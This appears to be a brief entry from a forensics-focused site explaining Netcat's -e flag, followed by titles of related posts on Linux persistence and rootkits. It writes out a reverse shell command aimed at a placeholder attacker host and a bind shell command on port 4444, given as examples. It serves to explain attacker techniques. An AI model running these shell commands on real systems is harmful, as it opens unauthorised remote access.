nc -e
0001-01-01
The -e flag in some Netcat implementations allows the user to specificy a command that gets executed within the session.
For example, an attacker may use this command to establish a reverse shell:
nc -e /bin/bash ATTACKER_IP ATTACKER_PORT
Or this to establish a bind shell on port 4444:
nc -e /bin/bash -lvp 4444
Linux Persistence: Modular Software
2025-04-17 DFIR CTF persistence linux persistence apache asterisk
Linux Persistence: Web Shells
2025-04-16 DFIR persistence webshell linux persistence webshell apache nginx PHP
Linux Persistence: Rootkits
2025-04-15 DFIR persistence rootkit LKM linux persistence LKM rootkit LD_PRELOAD kprobe ftrace ld.so hooking
Defanging Linux LKM Rootkits With cleanup_module()
2025-04-05 Linux LKM rootkits EDR hooks incident response Linux LKM rootkit